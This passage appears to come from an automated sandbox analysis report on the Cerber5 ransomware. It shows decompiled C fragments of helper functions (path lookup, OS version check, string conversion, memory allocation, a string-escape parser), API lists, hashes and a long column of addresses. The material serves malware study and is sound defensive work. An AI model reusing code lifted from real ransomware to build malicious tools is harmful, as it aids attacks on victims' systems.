                                                                                                                                                                                        • Opcode Fuzzy Hash: 39012ffd0e3606cec16687bb55fc47e4506806c2c1cc8f1209055042ebba4129
                                                                                                                                                                                        • Instruction Fuzzy Hash: 1B2196B1900204BADA1177A1AD47EBF7728CF52718F55043FF801751C3EA7E592A592F
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 71%
                                                                                                                                                                                        			E004015BB(WCHAR* __eax, void* __edx, void* __edi, void* __ebp) {
                                                                                                                                                                                        				intOrPtr _v0;
                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				WCHAR* _t4;
                                                                                                                                                                                        				signed int _t5;
                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                        				void* _t21;
                                                                                                                                                                                        				WCHAR* _t22;
                                                                                                                                                                                        				WCHAR* _t23;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t21 = __edi;
                                                                                                                                                                                        				_t20 = __edx;
                                                                                                                                                                                        				_t22 = __eax;
                                                                                                                                                                                        				_t4 = PathFindFileNameW(__eax);
                                                                                                                                                                                        				_push(_t22);
                                                                                                                                                                                        				if(_t4 == 0) {
                                                                                                                                                                                        					_t5 = 0;
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					_t5 = _t4 - _t22 >> 1;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t6 = E00405933(_t5);
                                                                                                                                                                                        				_t16 = _t6;
                                                                                                                                                                                        				if(_t6 != 0) {
                                                                                                                                                                                        					_t23 = E00405E43(_t16);
                                                                                                                                                                                        					if(_t23 != 0) {
                                                                                                                                                                                        						if(StrStrIW(_t23, E0040591C( &E0040CF2C, 0xa, 0xac7ba272)) == 0) {
                                                                                                                                                                                        							_push(_t23);
                                                                                                                                                                                        							_push(E0040591C(0x40cf38, 0xb, 0xd0a6f472));
                                                                                                                                                                                        							_push(_v0);
                                                                                                                                                                                        							E00402B9B(_t16, _t20, _t21, _t23);
                                                                                                                                                                                        							E00401423(_t20, _v0, _t23); // executed
                                                                                                                                                                                        						}
                                                                                                                                                                                        						E00405463(_t23);
                                                                                                                                                                                        					}
                                                                                                                                                                                        					return E00405463(_t16);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t6;
                                                                                                                                                                                        			}

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • PathFindFileNameW.SHLWAPI(004017DA,0040183A,00000000,00401784,00000000,?,?,?,?,?,?,?,?,004017DA), ref: 004015C0
                                                                                                                                                                                        • StrStrIW.SHLWAPI(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004017DA), ref: 00401600
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: FileFindNamePath
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1422272338-0
                                                                                                                                                                                        • Opcode ID: 72c02309d72f7f62d16f642f1d0bd5ff56be63fb299d4d1816ba234e5f969f8e
                                                                                                                                                                                        • Instruction ID: 6d1b098faf618f524d06ec00d72a205917cd9cbf5da5b16b4b33492abc688410
                                                                                                                                                                                        • Opcode Fuzzy Hash: 72c02309d72f7f62d16f642f1d0bd5ff56be63fb299d4d1816ba234e5f969f8e
                                                                                                                                                                                        • Instruction Fuzzy Hash: D7F0F972915A2177D6213B731C46F9F2548DF50765B080D3BF800B51D2EE7E8E1409EE
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                                        			E00406128(void* __ecx) {
                                                                                                                                                                                        				unsigned int _v44;
                                                                                                                                                                                        				signed short _v48;
                                                                                                                                                                                        				char _v56;
                                                                                                                                                                                        				signed int _t15;
                                                                                                                                                                                        				void* _t16;
                                                                                                                                                                                        				signed int _t21;
                                                                                                                                                                                        				int _t26;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t16 = __ecx;
                                                                                                                                                                                        				_t21 = 1;
                                                                                                                                                                                        				0x430728->dwOSVersionInfoSize = 0x11c;
                                                                                                                                                                                        				_t26 = GetVersionExW(0x430728);
                                                                                                                                                                                        				if(_t26 != 0) {
                                                                                                                                                                                        					L2:
                                                                                                                                                                                        					E004060A3(_t16, E00405905( &E0040D390, 0xc, 0x4f2d54ed),  &_v56); // executed
                                                                                                                                                                                        					 *0x43072c = _v48 >> 0x10;
                                                                                                                                                                                        					 *0x430730 = _v48 & 0x0000ffff;
                                                                                                                                                                                        					 *0x430734 = _v44 >> 0x10;
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					0x430728->dwOSVersionInfoSize = 0x114;
                                                                                                                                                                                        					_t15 = GetVersionExW(0x430728);
                                                                                                                                                                                        					asm("sbb esi, esi");
                                                                                                                                                                                        					_t21 =  ~( ~_t15);
                                                                                                                                                                                        					if(_t26 != 0) {
                                                                                                                                                                                        						goto L2;
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t21;
                                                                                                                                                                                        			}











                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetVersionExW.KERNEL32(00430728,00000000,00000000), ref: 00406143
                                                                                                                                                                                        • GetVersionExW.KERNEL32(00430728), ref: 00406158
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Version
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1889659487-0
                                                                                                                                                                                        • Opcode ID: 0b5fa071f19932b3c7421659f37e716286c27b89e514a381f7eba67cec8d384c
                                                                                                                                                                                        • Instruction ID: 0d92069c201c3664348ef7ec49be0af143c15c189a838557dcfb357f7670faaa
                                                                                                                                                                                        • Opcode Fuzzy Hash: 0b5fa071f19932b3c7421659f37e716286c27b89e514a381f7eba67cec8d384c
                                                                                                                                                                                        • Instruction Fuzzy Hash: 1D018675A012149BDB64ABADAC0599ABBECD748754B01223AF841F7291D77498048EE8
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 0156FF9C
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.410711762.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_1540000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                        • String ID: VirtualAlloc
                                                                                                                                                                                        • API String ID: 4275171209-164498762
                                                                                                                                                                                        • Opcode ID: f30858d0a422aae06dd199b9a003870d7df03182a4f3850dc3e6dcbbe834f4c4
                                                                                                                                                                                        • Instruction ID: e4b12ef191822caf347ae53b591ad069fd30dd24b1dbb9398093cd7dad0db141
                                                                                                                                                                                        • Opcode Fuzzy Hash: f30858d0a422aae06dd199b9a003870d7df03182a4f3850dc3e6dcbbe834f4c4
                                                                                                                                                                                        • Instruction Fuzzy Hash: 3A01E160D082CEEAEB01D7E8D409BFFBFB55F25704F044098D6846B282D6BA575887F6
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E00405594(int __eax, char* __esi, WCHAR* _a4, int _a8) {
                                                                                                                                                                                        				int _t7;
                                                                                                                                                                                        				int _t8;
                                                                                                                                                                                        				char* _t9;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t9 = __esi;
                                                                                                                                                                                        				_t7 = __eax;
                                                                                                                                                                                        				if(__eax == 0) {
                                                                                                                                                                                        					_t7 = lstrlenW(_a4);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t8 = WideCharToMultiByte(0x4e3, 0x200, _a4, _t7, _t9, _a8, 0, 0); // executed
                                                                                                                                                                                        				if(_a8 != 0) {
                                                                                                                                                                                        					if(_t8 > _a8) {
                                                                                                                                                                                        						_t8 = 0;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t9[_t8] = 0;
                                                                                                                                                                                        					return _t8;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t8;
                                                                                                                                                                                        			}







                                                                                                                                                                                        APIs
                                                                                                                                                                                        • lstrlenW.KERNEL32(?,?,00405654,?,00000000,00000000,00000000,004038B6,00405752,00000000,?,00000001,?,?,0040373F,?), ref: 0040559E
                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(000004E3,00000200,?,?,00000000,?,00000000,00000000,?,00405654,?,00000000,00000000,00000000,004038B6,00405752), ref: 004055BA
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ByteCharMultiWidelstrlen
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3109718747-0
                                                                                                                                                                                        • Opcode ID: 5a2cac91100831fce62050e1f373267da19f6c5bce9454b864975e02df754112
                                                                                                                                                                                        • Instruction ID: 629912970a630e42f43cef752591bf9dacf824b4a3be9ac7404a97a7c387281a
                                                                                                                                                                                        • Opcode Fuzzy Hash: 5a2cac91100831fce62050e1f373267da19f6c5bce9454b864975e02df754112
                                                                                                                                                                                        • Instruction Fuzzy Hash: 93E01A31140608BEEB315F91DC09F9B3FA9AB00714F608031BA18AD5E0D6B59990CB69
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E0040560B(int __eax, WCHAR* _a4, char _a8) {
                                                                                                                                                                                        				int _t4;
                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                        				char* _t10;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t4 = __eax;
                                                                                                                                                                                        				if(__eax == 0) {
                                                                                                                                                                                        					_t4 = lstrlenW(_a4) + 1;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t3 =  &_a8; // 0x40373f, executed
                                                                                                                                                                                        				_t6 = E00405594( *_t3, _t10, _a4, _t4); // executed
                                                                                                                                                                                        				return _t6;
                                                                                                                                                                                        			}







                                                                                                                                                                                        APIs
                                                                                                                                                                                        • lstrlenW.KERNEL32(?,00405678,?,?,00000000,00000000,004038B6,00405752,00000000,?,00000001,?,?,0040373F,?,?), ref: 00405613
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: lstrlen
                                                                                                                                                                                        • String ID: ?7@
                                                                                                                                                                                        • API String ID: 1659193697-917346843
                                                                                                                                                                                        • Opcode ID: a25e9545154fb78832ba4e914a0336995ac5df15bdb37131127fd86a27adcb8d
                                                                                                                                                                                        • Instruction ID: 49fb12f7e632107375035d62afd38228e3be900719d9c00f5f4622b73e0a0b72
                                                                                                                                                                                        • Opcode Fuzzy Hash: a25e9545154fb78832ba4e914a0336995ac5df15bdb37131127fd86a27adcb8d
                                                                                                                                                                                        • Instruction Fuzzy Hash: 21C01270008301AFEA05AB10EC0182B7BA5FB80321B10083AF88AE45A4DB3A8C50AA0D
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 98%
                                                                                                                                                                                        			E004034CB(void* __eflags, intOrPtr _a4, intOrPtr _a8, signed int* _a12) {
                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                        				unsigned int _v16;
                                                                                                                                                                                        				char* _v20;
                                                                                                                                                                                        				signed int _v24;
                                                                                                                                                                                        				signed int _v28;
                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                        				intOrPtr _t54;
                                                                                                                                                                                        				signed int _t59;
                                                                                                                                                                                        				signed int _t61;
                                                                                                                                                                                        				signed int _t63;
                                                                                                                                                                                        				signed int _t64;
                                                                                                                                                                                        				signed int _t65;
                                                                                                                                                                                        				signed int _t67;
                                                                                                                                                                                        				char* _t70;
                                                                                                                                                                                        				signed int _t72;
                                                                                                                                                                                        				char* _t77;
                                                                                                                                                                                        				int _t79;
                                                                                                                                                                                        				signed int _t85;
                                                                                                                                                                                        				signed int _t86;
                                                                                                                                                                                        				signed int _t87;
                                                                                                                                                                                        				signed int* _t88;
                                                                                                                                                                                        				signed int _t90;
                                                                                                                                                                                        				intOrPtr _t95;
                                                                                                                                                                                        				signed int _t96;
                                                                                                                                                                                        				signed int _t97;
                                                                                                                                                                                        				signed int _t99;
                                                                                                                                                                                        				signed int _t100;
                                                                                                                                                                                        				char* _t104;
                                                                                                                                                                                        				signed int _t107;
                                                                                                                                                                                        				char* _t112;
                                                                                                                                                                                        				intOrPtr* _t113;
                                                                                                                                                                                        				void* _t115;
                                                                                                                                                                                        				void* _t116;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t49 = E00405905(0x40d2b8, 4, 0xeed5962f);
                                                                                                                                                                                        				_t88 = _a12;
                                                                                                                                                                                        				_t112 = E004033A7(_a8, _t88, _t49);
                                                                                                                                                                                        				_t116 = _t115 + 0x10;
                                                                                                                                                                                        				if(_t112 == 0 ||  *_t112 != 0x22) {
                                                                                                                                                                                        					L60:
                                                                                                                                                                                        					return _t112;
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					_t113 = _t112 + 1;
                                                                                                                                                                                        					 *_t88 =  *_t88 - 1;
                                                                                                                                                                                        					if( *_t88 != 0) {
                                                                                                                                                                                        						_v12 = _v12 & 0x00000000;
                                                                                                                                                                                        						__eflags =  *_t113;
                                                                                                                                                                                        						_t104 = _t113;
                                                                                                                                                                                        						_v20 = _t104;
                                                                                                                                                                                        						if( *_t113 == 0) {
                                                                                                                                                                                        							L16:
                                                                                                                                                                                        							_t107 = E004053BD(_t90);
                                                                                                                                                                                        							_v24 = _t107;
                                                                                                                                                                                        							__eflags = _t107;
                                                                                                                                                                                        							if(_t107 != 0) {
                                                                                                                                                                                        								_v8 = _v8 & 0x00000000;
                                                                                                                                                                                        								__eflags = _v12;
                                                                                                                                                                                        								if(__eflags <= 0) {
                                                                                                                                                                                        									L58:
                                                                                                                                                                                        									 *_t107 = 0;
                                                                                                                                                                                        									_t54 = E0040572A(__eflags, _v24, _t107 - _v24); // executed
                                                                                                                                                                                        									 *((intOrPtr*)(_a4 + 0x20)) = _t54;
                                                                                                                                                                                        									E00405463(_v24);
                                                                                                                                                                                        									__eflags = 1;
                                                                                                                                                                                        									_t112 = E004033CD(1, _v20, _t88, 1);
                                                                                                                                                                                        									L59:
                                                                                                                                                                                        									goto L60;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								do {
                                                                                                                                                                                        									_t59 =  *_t113;
                                                                                                                                                                                        									__eflags = _t59 - 0x5c;
                                                                                                                                                                                        									if(_t59 == 0x5c) {
                                                                                                                                                                                        										_t113 = _t113 + 1;
                                                                                                                                                                                        										_t95 =  *_t113;
                                                                                                                                                                                        										_t61 = _t95 - 0x62;
                                                                                                                                                                                        										__eflags = _t61;
                                                                                                                                                                                        										if(_t61 == 0) {
                                                                                                                                                                                        											 *_t107 = 8;
                                                                                                                                                                                        											L55:
                                                                                                                                                                                        											_t107 = _t107 + 1;
                                                                                                                                                                                        											__eflags = _t107;
                                                                                                                                                                                        											goto L56;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										_t63 = _t61 - 4;
                                                                                                                                                                                        										__eflags = _t63;
                                                                                                                                                                                        										if(_t63 == 0) {
                                                                                                                                                                                        											 *_t107 = 0xc;
                                                                                                                                                                                        											goto L55;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										_t64 = _t63 - 8;
                                                                                                                                                                                        										__eflags = _t64;
                                                                                                                                                                                        										if(_t64 == 0) {
                                                                                                                                                                                        											 *_t107 = 0xa;
                                                                                                                                                                                        											goto L55;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										_t65 = _t64 - 4;
                                                                                                                                                                                        										__eflags = _t65;
                                                                                                                                                                                        										if(_t65 == 0) {
                                                                                                                                                                                        											 *_t107 = 0xd;
                                                                                                                                                                                        											goto L55;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										_t67 = _t65;
                                                                                                                                                                                        										__eflags = _t67;
                                                                                                                                                                                        										if(_t67 == 0) {
                                                                                                                                                                                        											 *_t107 = 9;
                                                                                                                                                                                        											goto L55;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										__eflags = _t67 == 1;
                                                                                                                                                                                        										if(_t67 == 1) {
                                                                                                                                                                                        											_push( &_v16);
                                                                                                                                                                                        											_t70 = E00405905(0x40d2d0, 3, 0x2559b91d);
                                                                                                                                                                                        											_t19 = _t113 + 1; // 0x3
                                                                                                                                                                                        											_t72 = sscanf(_t19, _t70);
                                                                                                                                                                                        											_t116 = _t116 + 0x18;
                                                                                                                                                                                        											__eflags = _t72;
                                                                                                                                                                                        											if(_t72 == 0) {
                                                                                                                                                                                        												goto L56;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											_t59 = _v16;
                                                                                                                                                                                        											_t113 = _t113 + 4;
                                                                                                                                                                                        											__eflags = _t59 - 0xdc00;
                                                                                                                                                                                        											if(_t59 < 0xdc00) {
                                                                                                                                                                                        												L32:
                                                                                                                                                                                        												__eflags = _t59;
                                                                                                                                                                                        												if(_t59 == 0) {
                                                                                                                                                                                        													goto L56;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												__eflags = _t59 - 0xfe;
                                                                                                                                                                                        												if(_t59 == 0xfe) {
                                                                                                                                                                                        													L36:
                                                                                                                                                                                        													_t23 = _t59 - 0xd800; // -55296
                                                                                                                                                                                        													_t96 = _t23;
                                                                                                                                                                                        													__eflags = _t96 - 0x3ff;
                                                                                                                                                                                        													if(_t96 > 0x3ff) {
                                                                                                                                                                                        														L42:
                                                                                                                                                                                        														__eflags = _t59 - 0x80;
                                                                                                                                                                                        														if(_t59 >= 0x80) {
                                                                                                                                                                                        															__eflags = _t59 - 0x800;
                                                                                                                                                                                        															if(_t59 >= 0x800) {
                                                                                                                                                                                        																__eflags = _t59 - 0x10000;
                                                                                                                                                                                        																asm("sbb ecx, ecx");
                                                                                                                                                                                        																_t97 = _t96 + 4;
                                                                                                                                                                                        																__eflags = _t97;
                                                                                                                                                                                        															} else {
                                                                                                                                                                                        																_t97 = 2;
                                                                                                                                                                                        															}
                                                                                                                                                                                        														} else {
                                                                                                                                                                                        															_t97 = 1;
                                                                                                                                                                                        														}
                                                                                                                                                                                        														_t100 = _t97;
                                                                                                                                                                                        														__eflags = _t97 - 1;
                                                                                                                                                                                        														if(_t97 <= 1) {
                                                                                                                                                                                        															L49:
                                                                                                                                                                                        															_t35 = _t97 + 0x40fdb4; // 0x835ff57
                                                                                                                                                                                        															 *_t107 =  *_t35 | _t59;
                                                                                                                                                                                        															_t107 = _t107 + _t97;
                                                                                                                                                                                        															_v8 = _v8 + _t97;
                                                                                                                                                                                        															goto L56;
                                                                                                                                                                                        														} else {
                                                                                                                                                                                        															do {
                                                                                                                                                                                        																 *(_t107 + _t100 - 1) = _t59 & 0x0000003f | 0x00000080;
                                                                                                                                                                                        																_t59 = _v16 >> 6;
                                                                                                                                                                                        																_t100 = _t100 - 1;
                                                                                                                                                                                        																_v16 = _t59;
                                                                                                                                                                                        																__eflags = _t100 - 1;
                                                                                                                                                                                        															} while (_t100 > 1);
                                                                                                                                                                                        															goto L49;
                                                                                                                                                                                        														}
                                                                                                                                                                                        													}
                                                                                                                                                                                        													__eflags =  *(_t113 + 1) - 0x5c;
                                                                                                                                                                                        													if( *(_t113 + 1) != 0x5c) {
                                                                                                                                                                                        														goto L56;
                                                                                                                                                                                        													}
                                                                                                                                                                                        													__eflags =  *((char*)(_t113 + 2)) - 0x75;
                                                                                                                                                                                        													if( *((char*)(_t113 + 2)) != 0x75) {
                                                                                                                                                                                        														goto L56;
                                                                                                                                                                                        													}
                                                                                                                                                                                        													_push( &_v28);
                                                                                                                                                                                        													_t77 = E00405905(0x40d2d0, 3, 0x2559b91d);
                                                                                                                                                                                        													_t27 = _t113 + 3; // 0x1
                                                                                                                                                                                        													_t79 = sscanf(_t27, _t77);
                                                                                                                                                                                        													_t116 = _t116 + 0x18;
                                                                                                                                                                                        													__eflags = _t79;
                                                                                                                                                                                        													if(_t79 == 0) {
                                                                                                                                                                                        														goto L56;
                                                                                                                                                                                        													}
                                                                                                                                                                                        													_t99 = _v28;
                                                                                                                                                                                        													_t113 = _t113 + 6;
                                                                                                                                                                                        													__eflags = _t99 - 0xdc00 - 0x3ff;
                                                                                                                                                                                        													if(_t99 - 0xdc00 > 0x3ff) {
                                                                                                                                                                                        														goto L56;
                                                                                                                                                                                        													}
                                                                                                                                                                                        													_t96 = _t99 & 0x000003ff;
                                                                                                                                                                                        													_t59 = (_t99 & 0x000003bf | 0x00000040) << 0x0000000a | _t96;
                                                                                                                                                                                        													__eflags = _t59;
                                                                                                                                                                                        													_v16 = _t59;
                                                                                                                                                                                        													goto L42;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												__eflags = _t59 - 0xff;
                                                                                                                                                                                        												if(_t59 == 0xff) {
                                                                                                                                                                                        													goto L36;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												_v8 = _v8 + 2;
                                                                                                                                                                                        												goto L21;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											__eflags = _t59 - 0xdfff;
                                                                                                                                                                                        											if(_t59 <= 0xdfff) {
                                                                                                                                                                                        												goto L56;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											goto L32;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										 *_t107 = _t95;
                                                                                                                                                                                        										goto L55;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									L21:
                                                                                                                                                                                        									 *_t107 = _t59;
                                                                                                                                                                                        									goto L55;
                                                                                                                                                                                        									L56:
                                                                                                                                                                                        									_t113 = _t113 + 1;
                                                                                                                                                                                        									_v8 = _v8 + 1;
                                                                                                                                                                                        									__eflags = _v8 - _v12;
                                                                                                                                                                                        								} while (__eflags < 0);
                                                                                                                                                                                        								_t88 = _a12;
                                                                                                                                                                                        								goto L58;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							_t112 = 0;
                                                                                                                                                                                        							goto L59;
                                                                                                                                                                                        						} else {
                                                                                                                                                                                        							goto L5;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                        							L5:
                                                                                                                                                                                        							__eflags =  *_t104 - 0x22;
                                                                                                                                                                                        							if( *_t104 == 0x22) {
                                                                                                                                                                                        								goto L16;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							_t85 =  *_t88;
                                                                                                                                                                                        							__eflags = _t85;
                                                                                                                                                                                        							if(_t85 == 0) {
                                                                                                                                                                                        								goto L16;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							_t86 = _t85 - 1;
                                                                                                                                                                                        							_v12 = _v12 + 1;
                                                                                                                                                                                        							 *_t88 = _t86;
                                                                                                                                                                                        							_t90 =  *_t104;
                                                                                                                                                                                        							_t104 = _t104 + 1;
                                                                                                                                                                                        							_v20 = _t104;
                                                                                                                                                                                        							__eflags = _t90 - 0x5c;
                                                                                                                                                                                        							if(_t90 == 0x5c) {
                                                                                                                                                                                        								__eflags =  *_t104 - 0x75;
                                                                                                                                                                                        								if( *_t104 == 0x75) {
                                                                                                                                                                                        									_t104 = _t104 + 5;
                                                                                                                                                                                        									_v20 = _t104;
                                                                                                                                                                                        									__eflags = _t86 - 5;
                                                                                                                                                                                        									if(_t86 >= 5) {
                                                                                                                                                                                        										_t90 = 5;
                                                                                                                                                                                        									} else {
                                                                                                                                                                                        										_t90 = _t86;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									_t87 = _t86 - _t90;
                                                                                                                                                                                        									_t11 =  &_v12;
                                                                                                                                                                                        									 *_t11 = _v12 + 2;
                                                                                                                                                                                        									__eflags =  *_t11;
                                                                                                                                                                                        								} else {
                                                                                                                                                                                        									_t104 = _t104 + 1;
                                                                                                                                                                                        									_v20 = _t104;
                                                                                                                                                                                        									_t87 = _t86 - 1;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								 *_t88 = _t87;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							__eflags =  *_t104;
                                                                                                                                                                                        							if( *_t104 != 0) {
                                                                                                                                                                                        								continue;
                                                                                                                                                                                        							} else {
                                                                                                                                                                                        								goto L16;
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        						goto L16;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t112 = 0;
                                                                                                                                                                                        					goto L60;
                                                                                                                                                                                        				}
                                                                                                                                                                                        			}







































                                                                                                                                                                                        0x0040365c
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00403665
                                                                                                                                                                                        0x00403672
                                                                                                                                                                                        0x0040367b
                                                                                                                                                                                        0x0040367f
                                                                                                                                                                                        0x00403685
                                                                                                                                                                                        0x00403688
                                                                                                                                                                                        0x0040368a
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00403690
                                                                                                                                                                                        0x00403699
                                                                                                                                                                                        0x0040369c
                                                                                                                                                                                        0x0040369e
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x004036ad
                                                                                                                                                                                        0x004036af
                                                                                                                                                                                        0x004036af
                                                                                                                                                                                        0x004036b1
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x004036b1
                                                                                                                                                                                        0x00403634
                                                                                                                                                                                        0x00403639
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0040363b
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0040363b
                                                                                                                                                                                        0x0040361a
                                                                                                                                                                                        0x0040361f
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0040361f
                                                                                                                                                                                        0x004035d8
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x004035d8
                                                                                                                                                                                        0x0040359c
                                                                                                                                                                                        0x0040359c
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0040371d
                                                                                                                                                                                        0x0040371d
                                                                                                                                                                                        0x0040371e
                                                                                                                                                                                        0x00403724
                                                                                                                                                                                        0x00403724
                                                                                                                                                                                        0x0040372d
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0040372d
                                                                                                                                                                                        0x0040357c
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00403523
                                                                                                                                                                                        0x00403523
                                                                                                                                                                                        0x00403523
                                                                                                                                                                                        0x00403526
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00403528
                                                                                                                                                                                        0x0040352a
                                                                                                                                                                                        0x0040352c
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0040352e
